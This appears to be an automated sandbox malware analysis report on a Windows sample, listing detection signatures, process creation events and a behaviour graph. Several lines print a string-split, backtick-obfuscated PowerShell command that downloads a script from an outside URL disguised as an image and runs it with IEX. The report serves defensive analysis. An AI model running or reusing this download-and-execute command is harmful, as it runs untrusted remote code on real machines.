Windows Analysis Report

Overview

General Information

Analysis ID: 1544132
Infos:

Detection

Score: 21
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suspicious powershell command line found
Creates a process in suspended mode (likely to inject code)
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)

Classification

Source: classification engine Classification label: sus21.win@4/0@0/0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '') Jump to behavior

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '') Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '') Jump to behavior

No Screenshots

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1544132 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 28/10/2024 Architecture: WINDOWS Score: 21 5 cmd.exe 1 2->5         started        signatures3 12 Suspicious powershell command line found 5->12 8 conhost.exe 5->8         started        10 powershell.exe 1 5->10         started        process4
No contacted IP infos